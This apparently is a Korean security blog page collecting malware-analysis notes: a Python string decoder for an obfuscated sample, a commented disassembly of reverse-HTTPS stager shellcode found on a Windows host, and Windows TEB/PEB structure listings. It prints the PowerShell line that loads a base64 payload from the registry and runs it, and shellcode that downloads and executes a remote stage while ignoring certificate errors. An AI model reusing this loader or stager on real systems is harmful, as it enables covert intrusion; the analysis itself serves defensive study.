'[+] etc..'에 해당되는 글 7건

reference : https://www.hauri.co.kr/security/security_view.html?intSeq=15&page=1&keyfield=&key=

#-*-coding:utf-8 -*-

import base64

def Operator(key):
    result = []
    OPkey = [0x28, 0x4, 0x20, 0x20]
    idx = 0
   
    for a in key:
        result.append(a + OPkey[idx])
        idx += 1

    return result

   
with open('str_info.txt', mode='rt') as f:
    result = f.read()
    result_list = result.split()
   
    for b64_encStr in result_list:
        b64_decStr = base64.b64decode(b64_encStr)
        data = b64_decStr[4:]
        key = b64_decStr[:4]
      
        result = ""

        if len(data)%4:
            for padding in range(4-len(data)%4):
                data += b"0"

        for dataSplit in zip(*[list(data[z::4]) for z in range(4)]):
            overflow = 0
            for index in range(4):
                if overflow:
                    key[index] = int(key[index])+int(overflow)
                    overflow = 0
                
                if key[index] > 255:
                    overflow  = int(str(hex(key[index]))[-3])
                    key[index] = int(str(hex(key[index]))[-2:], 16)
                    key[index] = int(key[index])
                    
                result += chr(dataSplit[index]^key[index])
            key = Operator(key)
            
        print(result)

; shellcode found on Windows host. Payload was stored in the registry. Powershell
; was used to extract it from the registry and execute it:
; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle \
; hidden -c "$val = (gp HKLM:SOFTWARE\'਀਀').'਀਀'; \
; $d = [System.Text.Encoding]::Unicode.GetString([System.convert]::FromBase64String($val)); iex $d"

; The following references were used to help comment the shellcode
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_https_proxy.asm
; https://hiddencodes.wordpress.com/2014/11/11/api-hash-list-4/

    0x00080000:  cld     cld
    0x00080001:  call    0x8008f
    0x00080006:  pushal  pushal   ; 60
    0x00080007:  mov     ebp, esp ; 98 e5
    0x00080009:  xor     edx, edx ; 31 d2
    0x0008000B:  mov     edx, dword ptr fs:[edx + 0x30]
    0x0008000F:  mov     edx, dword ptr [edx + 0xc]
    0x00080012:  mov     edx, dword ptr [edx + 0x14]
    0x00080015:  mov     esi, dword ptr [edx + 0x28]
    0x00080018:  movzx   ecx, word ptr [edx + 0x26]
    0x0008001C:  xor     edi, edi
    0x0008001E:  xor     eax, eax
    0x00080020:  lodsb   al, byte ptr [esi]
    0x00080021:  cmp     al, 0x61
    0x00080023:  jl      0x80027
    0x00080025:  sub     al, 0x20
    0x00080027:  ror     edi, 0xd
    0x0008002A:  add     edi, eax
    0x0008002C:  loop    0x8001e
    0x0008002E:  push    edx
    0x0008002F:  push    edi
    0x00080030:  mov     edx, dword ptr [edx + 0x10]
    0x00080033:  mov     eax, dword ptr [edx + 0x3c]
    0x00080036:  add     eax, edx
    0x00080038:  mov     eax, dword ptr [eax + 0x78]
    0x0008003B:  test    eax, eax
    0x0008003D:  je      0x80089
    0x0008003F:  add     eax, edx
    0x00080041:  push    eax
    0x00080042:  mov     ecx, dword ptr [eax + 0x18]
    0x00080045:  mov     ebx, dword ptr [eax + 0x20]
    0x00080048:  add     ebx, edx
    0x0008004A:  jecxz   0x80088
    0x0008004C:  dec     ecx
    0x0008004D:  mov     esi, dword ptr [ebx + ecx*4]
    0x00080050:  add     esi, edx
    0x00080052:  xor     edi, edi
    0x00080054:  xor     eax, eax
    0x00080056:  lodsb   al, byte ptr [esi]
    0x00080057:  ror     edi, 0xd
    0x0008005A:  add     edi, eax
    0x0008005C:  cmp     al, ah
    0x0008005E:  jne     0x80054
    0x00080060:  add     edi, dword ptr [ebp - 8]
    0x00080063:  cmp     edi, dword ptr [ebp + 0x24]
    0x00080066:  jne     0x8004a
    0x00080068:  pop     eax
    0x00080069:  mov     ebx, dword ptr [eax + 0x24]
    0x0008006C:  add     ebx, edx
    0x0008006E:  mov     cx, word ptr [ebx + ecx*2]
    0x00080072:  mov     ebx, dword ptr [eax + 0x1c]
    0x00080075:  add     ebx, edx
    0x00080077:  mov     eax, dword ptr [ebx + ecx*4]
    0x0008007A:  add     eax, edx
    0x0008007C:  mov     dword ptr [esp + 0x24], eax
    0x00080080:  pop     ebx    ; 5b
    0x00080081:  pop     ebx    ; 5b
    0x00080082:  popal   popal  ; 61
    0x00080083:  pop     ecx    ; 59
    0x00080084:  pop     edx    ; 5a
    0x00080085:  push    ecx    ; 51
    0x00080086:  jmp     eax    ; ff e0
    0x00080088:  pop     eax    ; 58
    0x00080089:  pop     edi
    0x0008008A:  pop     edx
    0x0008008B:  mov     edx, dword ptr [edx]
    0x0008008D:  jmp     0x80015
    0x0008008F:  pop     ebp

; load wininet
    0x00080090:  push    0x74656e            ; Push the bytes 'wininet',0 onto the stack.
    0x00080095:  push    0x696e6977          ; ...
    0x0008009A:  push    esp                 ; Push a pointer to the "wininet" string on the stack.
    0x0008009B:  push    0x726774c           ; hash( "kernel32.dll", "LoadLibraryA" )
    0x000800A0:  call    ebp                 ; LoadLibraryA( "wininet" )
    0x000800A2:  call    0x80127

; user agent string - Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; ASU2JS)

    ; INTERNETAPI_(HINTERNET) InternetOpenA(
    ;   LPCSTR lpszAgent,
    ;   DWORD  dwAccessType,
    ;   LPCSTR lpszProxy,
    ;   LPCSTR lpszProxyBypass,
    ;   DWORD  dwFlags);
    0x0008012C:  push    edi
    0x0008012D:  push    edi
    0x0008012E:  push    ecx
    0x0008012F:  push    0xa779563a      ; hash( "wininet.dll", "InternetOpenA" )
    0x00080134:  call    ebp

    0x00080136:  jmp     0x801ce

    ; void InternetConnectA(
    ;     HINTERNET     hInternet,
    ;     LPCSTR        lpszServerName,
    ;     INTERNET_PORT nServerPort,
    ;     LPCSTR        lpszUserName,
    ;     LPCSTR        lpszPassword,
    ;     DWORD         dwService,
    ;     DWORD         dwFlags,
    ;     DWORD_PTR     dwContext);
    0x0008013B:  pop     ebx             ; pop URL (hostname), store in ebx
    0x0008013C:  xor     ecx, ecx        ; NULL
    0x0008013E:  push    ecx             ; DWORD_PTR dwContext (NULL)
    0x0008013F:  push    ecx             ; dwFlags (NULL)
    0x00080140:  push    3               ; DWORD dwService (INTERNET_SERVICE_HTTP)
    0x00080142:  push    ecx             ; password (NULL)
    0x00080143:  push    ecx             ; username (NULL)
    0x00080144:  push    0x1bb           ; port 443
    0x00080149:  push    ebx             ; hostname
    0x0008014A:  push    eax             ; HINTERNET hInternet
    0x0008014B:  push    0xc69f8957      ; hash( "wininet.dll", "InternetConnectA" )
    0x00080150:  call    ebp
    0x00080152:  mov     ebx, eax        ; save hInternet

    0x00080154:  jmp     0x801d0

    ; INTERNETAPI_(HINTERNET) HttpOpenRequestA(
    ;   HINTERNET hConnect,
    ;   LPCSTR    lpszVerb,
    ;   LPCSTR    lpszObjectName,
    ;   LPCSTR    lpszVersion,
    ;   LPCSTR    lpszReferrer,
    ;   LPCSTR    *lplpszAcceptTypes,
    ;   DWORD     dwFlags,
    ;   DWORD_PTR dwContext);
    0x00080156:  pop     ecx
    0x00080157:  xor     edx, edx        ; NULL
    0x00080159:  push    edx             ; dwContext (NULL)
    0x0008015A:  push    0x84a03200      ; ( 0x80000000 | 0x04000000 | 0x00800000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags
                                         ;   0x80000000 |        ; INTERNET_FLAG_RELOAD
                                         ;   0x04000000 |        ; INTERNET_NO_CACHE_WRITE
                                         ;   0x00800000 |        ; INTERNET_FLAG_SECURE
                                         ;   0x00200000 |        ; INTERNET_FLAG_NO_AUTO_REDIRECT
                                         ;   0x00001000 |        ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
                                         ;   0x00002000 |        ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
                                         ;   0x00000200          ; INTERNET_FLAG_NO_UI
    0x0008015F:  push    edx             ; accept types (NULL)
    0x00080160:  push    edx             ; referrer (NULL)
    0x00080161:  push    edx             ; version (NULL)
    0x00080162:  push    ecx             ; url
    0x00080163:  push    edx             ; method
    0x00080164:  push    eax             ; hConnection
    0x00080165:  push    0x3b2e55eb      ; hash( "wininet.dll", "HttpOpenRequestA" )
    0x0008016A:  call    ebp
    0x0008016C:  mov     esi, eax        ; hHttpRequest

    ; BOOLAPI InternetSetOptionA(
    ;   HINTERNET hInternet,
    ;   DWORD     dwOption,
    ;   LPVOID    lpBuffer,
    ;   DWORD     dwBufferLength);
    0x0008016E:  push    0x3380          ; 0x00002000 |        ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
                                         ; 0x00001000 |        ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
                                         ; 0x00000200 |        ; SECURITY_FLAG_IGNORE_WRONG_USAGE
                                         ; 0x00000100 |        ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
                                         ; 0x00000080          ; SECURITY_FLAG_IGNORE_REVOCATION
    0x00080173:  mov     eax, esp        ; move flags into eax

    0x00080175:  push    4               ; sizeof(dwFlags)
    0x00080177:  push    eax             ; &dwFlags
    0x00080178:  push    0x1f            ; DWORD dwOption (31 = INTERNET_OPTION_SECURITY_FLAGS)
    0x0008017A:  push    esi             ; hRequest
    0x0008017B:  push    0x869e4675      ; hash( "wininet.dll", "InternetSetOptionA" )
    0x00080180:  call    ebp

    ; BOOLAPI HttpSendRequestA(
    ;   HINTERNET hRequest,
    ;   LPCSTR    lpszHeaders,
    ;   DWORD     dwHeadersLength,
    ;   LPVOID    lpOptional,
    ;   DWORD     dwOptionalLength);
    0x00080182:  xor     edi, edi        ; NULL
    0x00080184:  push    edi             ; optional length
    0x00080185:  push    edi             ; optional
    0x00080186:  push    edi             ; dwHeadersLength
    0x00080187:  push    edi             ; headers
    0x00080188:  push    esi             ; hHttpRequest
    0x00080189:  push    0x7b18062d      ; hash( "wininet.dll", "HttpSendRequestA" )
    0x0008018E:  call    ebp
    0x00080190:  test    eax, eax        ; test for failure
    0x00080192:  je      0x801dc

    0x00080194:  xor     edi, edi
    0x00080196:  test    esi, esi
    0x00080198:  je      0x8019e
    0x0008019A:  mov     ecx, edi
    0x0008019C:  jmp     0x801a7
    0x0008019E:  push    0x5de2c5aa     ; hash( "kernel32.dll", "GetLastError" )
    0x000801A3:  call    ebp
    0x000801A5:  mov     ecx, eax
    0x000801A7:  push    0x315e2145     ; GetDesktopWindow
    0x000801AC:  call    ebp
    0x000801AE:  xor     edi, edi
    0x000801B0:  push    edi
    0x000801B1:  push    7
    0x000801B3:  push    ecx
    0x000801B4:  push    esi
    0x000801B5:  push    eax
    0x000801B6:  push    0xbe057b7      ; InternetErrorDlg
    0x000801BB:  call    ebp
    0x000801BD:  mov     edi, 0x2f00
    0x000801C2:  cmp     edi, eax
    0x000801C4:  jne     0x801ca
    0x000801C6:  mov     eax, ebx
    0x000801C8:  jmp     0x80154
    0x000801CA:  xor     edi, edi
    0x000801CC:  jmp     0x801e3
    0x000801CE:  jmp     0x80219
    0x000801D0:  call    0x80156
    0x000801D5:  das     das
    0x000801D6:  push    ebx
    0x000801D7:  outsw   dx, word ptr [esi]
    0x000801D9:  xor     al, 0
    0x000801DB:  add     byte ptr [eax - 0x10], ch
    0x000801DE:  mov     ch, 0xa2
    0x000801E0:  push    esi
    0x000801E1:  call    ebp

    0x000801E3:  push    0x40          ; PAGE_EXECUTE_READWRITE
    0x000801E5:  push    0x1000        ; MEM_COMMIT
    0x000801EA:  push    0x400000      ; Stage allocation (8Mb ought to do us)
    0x000801EF:  push    edi           ; NULL
    0x000801F0:  push    0xe553a458    ; hash( "kernel32.dll", "VirtualAlloc" )
    0x000801F5:  call    ebp           ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
    0x000801F7:  xchg    eax, ebx
    0x000801F8:  push    ebx
    0x000801F9:  push    ebx
    0x000801FA:  mov     edi, esp
    0x000801FC:  push    edi           ; &bytesRead
    0x000801FD:  push    0x2000        ; read length
    0x00080202:  push    ebx           ; buffer
    0x00080203:  push    esi           ; hRequest
    0x00080204:  push    0xe2899612    ; hash( "wininet.dll", "InternetReadFile" )
    0x00080209:  call    ebp
    0x0008020B:  test    eax, eax      ; download failed? (optional?)
    0x0008020D:  je      0x801dc       ; failure???
    0x0008020F:  mov     eax, dword ptr [edi]
    0x00080211:  add     ebx, eax      ; buffer += bytes_received
    0x00080213:  test    eax, eax      ; optional?
    0x00080215:  jne     0x801fc       ; download_more???
    0x00080217:  pop     eax           ; clear the temporary storage
    0x00080218:  ret     ret           ; dive into the stored stage address
    0x00080219:  call    0x8013b       ; InternetConnectA

url:
	; 0x0008021E: 61
	; url foobar.com

출처 : https://gist.github.com/jdferrell3/4db966da06f4fa77816a54d802aca0f8 

TIB structure

struct _TEB {
    0x000 _NT_TIB NtTib;
    0x01c void* EnvironmentPointer;
    0x020 _CLIENT_ID ClientId;
    0x028 void* ActiveRpcHandle;
    0x02c void* ThreadLocalStoragePointer;
    0x030 _PEB* ProcessEnvironmentBlock;  /* In WinNT (incl. Win 2K, XP, and Vista), the most significant bit of the PEB pointer is typically never set, because high memory addresses are reserved for the OS. */ </b>
    0x034 DWORD LastErrorValue;
    0x038 DWORD CountOfOwnedCriticalSections;
    0x03c void* CsrClientThread;
    0x040 void* Win32ThreadInfo;
    0x044 DWORD User32Reserved[26];
    0x0ac DWORD UserReserved[5];
    0x0c0 void* WOW32Reserved;
    0x0c4 DWORD CurrentLocale;
    0x0c8 DWORD FpSoftwareStatusRegister;
    0x0cc void* SystemReserved1[54];
    0x1a4 int ExceptionCode;
    0x1a8 _ACTIVATION_CONTEXT_STACK ActivationContextStack;
    0x1bc DWORD SpareBytes1[24];
    0x1d4 _GDI_TEB_BATCH GdiTebBatch;
    0x6b4 _CLIENT_ID RealClientId;
    0x6bc void* GdiCachedProcessHandle;
    0x6c0 DWORD GdiClientPID;
    0x6c4 DWORD GdiClientTID;
    0x6c8 void* GdiThreadLocalInfo;
    0x6cc DWORD Win32ClientInfo[62];
    0x7c4 void* glDispatchTable[233];
    0xb68 DWORD glReserved1[29];
    0xbdc void* glReserved2;
    0xbe0 void* glSectionInfo;
    0xbe4 void* glSection;
    0xbe8 void* glTable;
    0xbec void* glCurrentRC;
    0xbf0 void* glContext;
    0xbf4 DWORD LastStatusValue;
    0xbf8 _UNICODE_STRING StaticUnicodeString;
    0xc00 WORD StaticUnicodeBuffer[261];
    0xe0c void* DeallocationStack;
    0xe10 void* TlsSlots[64];
    0xf10 _LIST_ENTRY TlsLinks;
    0xf18 void* Vdm;
    0xf1c void* ReservedForNtRpc;
    0xf20 void* DbgSsReserved[2];
    0xf28 DWORD HardErrorsAreDisabled;
    0xf2c void* Instrumentation[16];
    0xf6c void* WinSockData;
    0xf70 DWORD GdiBatchCount;
    0xf74 UChar InDbgPrint;
    0xf75 UChar FreeStackOnTermination;
    0xf76 UChar HasFiberData;
    0xf77 UChar IdealProcessor;
    0xf78 DWORD Spare3;
    0xf7c void* ReservedForPerf;
    0xf80 void* ReservedForOle;
    0xf84 DWORD WaitingOnLoaderLock;
    0xf88 _Wx86ThreadState Wx86Thread;
    0xf94 void** TlsExpansionSlots;
    0xf98 DWORD ImpersonationLocale;
    0xf9c DWORD IsImpersonating;
    0xfa0 void* NlsCache;
    0xfa4 void* pShimData;
    0xfa8 DWORD HeapVirtualAffinity;
    0xfac void* CurrentTransactionHandle;
    0xfb0 _TEB_ACTIVE_FRAME* ActiveFrame;
};

PEB structure

struct _PEB {
    0x000 BYTE InheritedAddressSpace;
    0x001 BYTE ReadImageFileExecOptions;
    0x002 BYTE BeingDebugged;
    0x003 BYTE SpareBool;
    0x004 void* Mutant;
    0x008 void* ImageBaseAddress;
    0x00c _PEB_LDR_DATA* Ldr;
    0x010 _RTL_USER_PROCESS_PARAMETERS* ProcessParameters;
    0x014 void* SubSystemData;
    0x018 void* ProcessHeap;
    0x01c _RTL_CRITICAL_SECTION* FastPebLock;
    0x020 void* FastPebLockRoutine;
    0x024 void* FastPebUnlockRoutine;
    0x028 DWORD EnvironmentUpdateCount;
    0x02c void* KernelCallbackTable;
    0x030 DWORD SystemReserved[1];
    0x034 DWORD ExecuteOptions:2; // bit offset: 34, len=2
    0x034 DWORD SpareBits:30; // bit offset: 34, len=30
    0x038 _PEB_FREE_BLOCK* FreeList;
    0x03c DWORD TlsExpansionCounter;
    0x040 void* TlsBitmap;
    0x044 DWORD TlsBitmapBits[2];
    0x04c void* ReadOnlySharedMemoryBase;
    0x050 void* ReadOnlySharedMemoryHeap;
    0x054 void** ReadOnlyStaticServerData;
    0x058 void* AnsiCodePageData;
    0x05c void* OemCodePageData;
    0x060 void* UnicodeCaseTableData;
    0x064 DWORD NumberOfProcessors;
    0x068 DWORD NtGlobalFlag;
    0x070 _LARGE_INTEGER CriticalSectionTimeout;
    0x078 DWORD HeapSegmentReserve;
    0x07c DWORD HeapSegmentCommit;
    0x080 DWORD HeapDeCommitTotalFreeThreshold;
    0x084 DWORD HeapDeCommitFreeBlockThreshold;
    0x088 DWORD NumberOfHeaps;
    0x08c DWORD MaximumNumberOfHeaps;
    0x090 void** ProcessHeaps;
    0x094 void* GdiSharedHandleTable;
    0x098 void* ProcessStarterHelper;
    0x09c DWORD GdiDCAttributeList;
    0x0a0 void* LoaderLock;
    0x0a4 DWORD OSMajorVersion;
    0x0a8 DWORD OSMinorVersion;
    0x0ac WORD OSBuildNumber;
    0x0ae WORD OSCSDVersion;
    0x0b0 DWORD OSPlatformId;
    0x0b4 DWORD ImageSubsystem;
    0x0b8 DWORD ImageSubsystemMajorVersion;
    0x0bc DWORD ImageSubsystemMinorVersion;
    0x0c0 DWORD ImageProcessAffinityMask;
    0x0c4 DWORD GdiHandleBuffer[34];
    0x14c void (*PostProcessInitRoutine)();
    0x150 void* TlsExpansionBitmap;
    0x154 DWORD TlsExpansionBitmapBits[32];
    0x1d4 DWORD SessionId;
    0x1d8 _ULARGE_INTEGER AppCompatFlags;
    0x1e0 _ULARGE_INTEGER AppCompatFlagsUser;
    0x1e8 void* pShimData;
    0x1ec void* AppCompatInfo;
    0x1f0 _UNICODE_STRING CSDVersion;
    0x1f8 void* ActivationContextData;
    0x1fc void* ProcessAssemblyStorageMap;
    0x200 void* SystemDefaultActivationContextData;
    0x204 void* SystemAssemblyStorageMap;
    0x208 DWORD MinimumStackCommit;
);

PEB -> LDR_DATA

typedef struct _PEB_LDR_DATA
{
    0x00    ULONG         Length;                            /* Size of structure, used by ntdll.dll as structure version ID */
    0x04    BOOLEAN       Initialized;                       /* If set, loader data section for current process is initialized */
    0x08    PVOID         SsHandle;
    0x0c    LIST_ENTRY    InLoadOrderModuleList;             /* Pointer to LDR_DATA_TABLE_ENTRY structure. Previous and next module in load order */
    0x14    LIST_ENTRY    InMemoryOrderModuleList;           /* Pointer to LDR_DATA_TABLE_ENTRY structure. Previous and next module in memory placement order */
    0x1c    LIST_ENTRY    InInitializationOrderModuleList;   /* Pointer to LDR_DATA_TABLE_ENTRY structure. Previous and next module in initialization order */
} PEB_LDR_DATA,*PPEB_LDR_DATA; // +0x24